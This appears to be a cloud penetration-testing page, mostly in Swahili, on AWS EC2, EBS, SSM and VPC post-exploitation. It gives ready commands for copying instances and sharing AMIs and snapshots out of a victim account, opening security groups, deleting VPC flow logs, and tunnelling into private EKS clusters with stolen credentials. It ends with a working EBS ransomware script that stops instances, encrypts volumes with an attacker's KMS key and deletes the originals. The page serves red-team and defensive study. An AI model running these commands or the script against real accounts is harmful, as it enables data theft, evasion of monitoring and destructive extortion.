AWS - EC2, EBS, SSM & VPC Post Exploitation

Reading time: 14 minutes

EC2 & VPC

Kwa maelezo zaidi angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

Malicious VPC Mirror - ec2:DescribeInstances, ec2:RunInstances, ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress, ec2:CreateTrafficMirrorTarget, ec2:CreateTrafficMirrorSession, ec2:CreateTrafficMirrorFilter, ec2:CreateTrafficMirrorFilterRule

VPC traffic mirroring hupiga picha ya trafiki ya ndani na nje kwa EC2 instances ndani ya VPC bila haja ya kufunga chochote kwenye instances wenyewe. Trafiki hii iliyopigwa picha kawaida itatumwa kwa kitu kama mfumo wa kugundua uvamizi wa mtandao (IDS) kwa uchambuzi na ufuatiliaji.
Mshambuliaji anaweza kutumia hii kukamata trafiki yote na kupata taarifa nyeti kutoka kwake:

Kwa maelezo zaidi angalia ukurasa huu:

AWS - Malicious VPC Mirror

Copy Running Instance

Instances kwa kawaida zina aina fulani ya taarifa nyeti. Kuna njia tofauti za kuingia (angalia EC2 privilege escalation tricks). Hata hivyo, njia nyingine ya kuangalia kile kinachomo ni kuunda AMI na kuendesha instance mpya (hata katika akaunti yako mwenyewe) kutoka kwake:

# List instances
aws ec2 describe-images

# create a new image for the instance-id
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# add key to AWS
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# now you can check the instance
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# If needed : edit groups
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1

# be a good guy, clean our instance to avoid any useless cost
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1

EBS Snapshot dump

Snapshots ni nakala za volumes, ambazo kwa kawaida zitakuwa na taarifa nyeti, hivyo kuzikagua kunapaswa kufichua taarifa hii.
Ikiwa unapata volume bila snapshot unaweza: Kuunda snapshot na kufanya hatua zifuatazo au tu kuikamata katika instance ndani ya akaunti:

AWS - EBS Snapshot Dump

Data Exfiltration

DNS Exfiltration

Hata kama unafunga EC2 ili hakuna trafiki inayoweza kutoka, bado inaweza kuondolewa kupitia DNS.

• VPC Flow Logs haitarekodi hii.
• Huna ufikiaji wa AWS DNS logs.
• Zima hii kwa kuweka "enableDnsSupport" kuwa false na:

aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>

Exfiltration via API calls

Mshambuliaji anaweza kuita API endpoints za akaunti inayodhibitiwa na yeye. Cloudtrail itarekodi hizi simu na mshambuliaji ataweza kuona data iliyondolewa katika Cloudtrail logs.

Open Security Group

Unaweza kupata ufikiaji zaidi kwa huduma za mtandao kwa kufungua port kama hii:

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC

Privesc to ECS

Inawezekana kuendesha EC2 instance na kuisajili kutumika kuendesha ECS instances kisha kuiba data ya ECS instances.

Kwa maelezo zaidi angalia hii.

Remove VPC flow logs

aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>

SSM Port Forwarding

Required permissions:

• ssm:StartSession

Mbali na utekelezaji wa amri, SSM inaruhusu tunneling ya trafiki ambayo inaweza kutumika kubadilisha kutoka kwa EC2 instances ambazo hazina ufikiaji wa mtandao kwa sababu ya Security Groups au NACLs. Moja ya hali ambapo hii ni muhimu ni kubadilisha kutoka kwa Bastion Host hadi klasta ya EKS ya kibinafsi.

Ili kuanza kikao unahitaji kuwa na SessionManagerPlugin iliyosakinishwa: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

1. Sakinisha SessionManagerPlugin kwenye mashine yako
2. Ingia kwenye Bastion EC2 ukitumia amri ifuatayo:

aws ssm start-session --target "$INSTANCE_ID"

3. Pata akreditivu za muda za Bastion EC2 AWS kwa kutumia Abusing SSRF in AWS EC2 environment script
4. Hamisha akreditivu hizo kwenye mashine yako mwenyewe katika faili ya $HOME/.aws/credentials kama profaili ya [bastion-ec2]
5. Ingia kwenye EKS kama Bastion EC2:

aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>

6. Sasisha uwanja wa server katika faili ya $HOME/.kube/config ili kuelekeza kwenye https://localhost
7. Unda tunnel ya SSM kama ifuatavyo:

sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>

8. Trafiki kutoka kwa zana ya kubectl sasa inasambazwa kupitia tunnel ya SSM kupitia Bastion EC2 na unaweza kufikia klasta ya EKS ya kibinafsi kutoka kwa mashine yako mwenyewe kwa kukimbia:

kubectl get pods --insecure-skip-tls-verify

Kumbuka kwamba muunganisho wa SSL utafaulu isipokuwa uweke bendera --insecure-skip-tls-verify (au sawa yake katika zana za ukaguzi za K8s). Kwa kuwa trafiki inapitishwa kupitia handaki salama la AWS SSM, uko salama kutokana na aina yoyote ya mashambulizi ya MitM.

Hatimaye, mbinu hii si maalum kwa kushambulia vikundi vya EKS vya kibinafsi. Unaweza kuweka majina ya kikoa na bandari za kiholela kuhamasisha huduma nyingine yoyote ya AWS au programu maalum.

Share AMI

aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

Tafuta taarifa nyeti katika AMIs za umma na binafsi

• https://github.com/saw-your-packet/CloudShovel: CloudShovel ni chombo kilichoundwa ili kutafuta taarifa nyeti ndani ya picha za mashine za Amazon (AMIs) za umma au binafsi. Inafanya mchakato wa kuzindua matukio kutoka kwa AMIs lengwa, kuunganisha volumu zao, na kuchanganua kwa siri au data nyeti zinazoweza kuwepo.

Shiriki EBS Snapshot

aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

EBS Ransomware PoC

Uthibitisho wa dhana unaofanana na onyesho la Ransomware lililoonyeshwa katika maelezo ya S3 post-exploitation. KMS inapaswa kubadilishwa jina kuwa RMS kwa Huduma ya Usimamizi wa Ransomware kutokana na urahisi wa kuitumia kuandika huduma mbalimbali za AWS kwa kutumia hiyo.

Kwanza kutoka kwa akaunti ya 'mshambuliaji' ya AWS, tengeneza funguo inayosimamiwa na mteja katika KMS. Kwa mfano huu tutaruhusu AWS kusimamia data ya funguo kwangu, lakini katika hali halisi, mhusika mbaya angehifadhi data ya funguo nje ya udhibiti wa AWS. Badilisha sera ya funguo ili kuruhusu kwa kila Akaunti ya AWS Principal kutumia funguo hiyo. Kwa sera hii ya funguo, jina la akaunti lilikuwa 'AttackSim' na sheria ya sera inayoruhusu ufikiaji wote inaitwa 'Outside Encryption'

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Outside Encryption",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey",
"kms:GenerateDataKeyWithoutPlainText",
"kms:CreateGrant"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:CreateGrant",
"kms:ListGrants",
"kms:RevokeGrant"
],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

Sera ya funguo inahitaji yafuatayo kuwezeshwa ili kuruhusu uwezo wa kuitumia kuandika EBS volume:

• kms:CreateGrant
• kms:Decrypt
• kms:DescribeKey
• kms:GenerateDataKeyWithoutPlainText
• kms:ReEncrypt

Sasa na funguo inayopatikana hadharani kutumia. Tunaweza kutumia akaunti ya 'mwathirika' ambayo ina EC2 instances kadhaa zilizozinduliwa zikiwa na EBS volumes zisizoandikwa. EBS volumes za akaunti hii ya 'mwathirika' ndizo tunazolenga kwa ajili ya kuandika, shambulio hili likiwa chini ya dhana ya uvunjaji wa akaunti ya AWS yenye mamlaka ya juu.

Kama mfano wa S3 ransomware. Shambulio hili litaunda nakala za EBS volumes zilizounganishwa kwa kutumia snapshots, kutumia funguo inayopatikana hadharani kutoka akaunti ya 'mshambuliaji' kuandika EBS volumes mpya, kisha kuondoa EBS volumes za asili kutoka EC2 instances na kuzifuta, na hatimaye kufuta snapshots zilizotumika kuunda EBS volumes mpya zilizokuwa zimeandikwa.

Hii inasababisha kuwa na EBS volumes tu zilizokuwa zimeandikwa zilizobaki katika akaunti.

Pia inafaa kutaja, script ilisimamisha EC2 instances ili kuondoa na kufuta EBS volumes za asili. EBS volumes za asili zisizoandikwa zimeondolewa sasa.

Ifuatayo, rudi kwenye sera ya funguo katika akaunti ya 'mshambuliaji' na uondoe sheria ya sera ya 'Uandishi wa Nje' kutoka kwenye sera ya funguo.

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

Subiri kwa muda ili sera mpya ya ufunguo iweze kuenea. Kisha rudi kwenye akaunti ya 'mwathirika' na jaribu kuunganisha moja ya volumu za EBS zilizofichwa kwa siri. Utagundua kwamba unaweza kuunganisha volumu hiyo.

Lakini unapojaribu kuanzisha tena EC2 instance na volumu ya EBS iliyofichwa kwa siri itashindwa tu na kurudi kutoka hali ya 'pending' hadi hali ya 'stopped' milele kwani volumu ya EBS iliyounganishwa haiwezi kufichuliwa kwa kutumia ufunguo kwani sera ya ufunguo haiiruhusu tena.

Hii ni script ya python inayotumika. Inachukua AWS creds kwa akaunti ya 'mwathirika' na thamani ya AWS ARN inayopatikana hadharani kwa ufunguo utakaotumika kwa ajili ya ufichuzi. Script itafanya nakala zilizofichwa za EBS zote zinazopatikana zilizounganishwa kwa EC2 instances zote katika akaunti ya AWS iliyolengwa, kisha itasimamisha kila EC2 instance, kuondoa volumu za EBS za awali, kuzifuta, na hatimaye kufuta snapshots zote zilizotumika wakati wa mchakato. Hii itawaacha tu volumu za EBS zilizofichwa katika akaunti ya 'mwathirika' iliyolengwa. TUMIA SCRIPT HII KATIKA KIZAZI CHA MAJARIBIO TU, NI DESTRUCTIVE NA ITAFUTA VOLUMU ZOTE ZA EBS ZA AWALI. Unaweza kuzirejesha kwa kutumia ufunguo wa KMS ulio tumika na kuzirudisha katika hali yao ya awali kupitia snapshots, lakini nataka kukufahamisha kwamba hii ni PoC ya ransomware mwishoni mwa siku.

import boto3
import argparse
from botocore.exceptions import ClientError

def enumerate_ec2_instances(ec2_client):
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes

def snapshot_volumes(ec2_client, volumes):
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids

def wait_for_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])

def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']

volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids

def stop_instances(ec2_client, instance_ids):
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']

if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")

except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")

def detach_and_delete_volumes(ec2_client, volumes):
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")


def delete_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")

def replace_volumes(ec2_client, instance_volumes):
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)

all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)

def ebs_lock(access_key, secret_key, region, kms_key_arn):
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed

def parse_arguments():
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()

def main():
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)

if __name__ == "__main__":
main()